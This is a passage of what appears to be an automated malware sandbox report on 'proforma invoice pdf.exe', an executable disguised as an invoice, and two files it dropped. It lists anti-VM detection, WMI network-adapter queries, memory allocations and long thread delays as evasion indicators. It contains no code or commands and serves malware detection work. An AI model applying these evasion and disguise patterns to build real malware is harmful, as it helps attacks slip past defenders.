Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 6668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 5528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4428, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 7570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 8570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: BAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 8700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 2D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Memory allocated: 4D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 2330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 2330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 4330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 6850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 7850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: AEB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 79D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 28D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 2B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Memory allocated: 2940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 1040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 2F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 79D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 73B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: BB20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 89D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 3210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 13A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 2E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 72B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 82B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: B810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 8430000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 2930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Memory allocated: 2760000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199818	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199598	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199458	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199171	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199054	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599860	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599735	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599363	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598165	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596944	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596712	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596559	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596352	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594558	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199826
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199525
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199421
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199310
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199203
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199091
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1198983
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599763
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599219
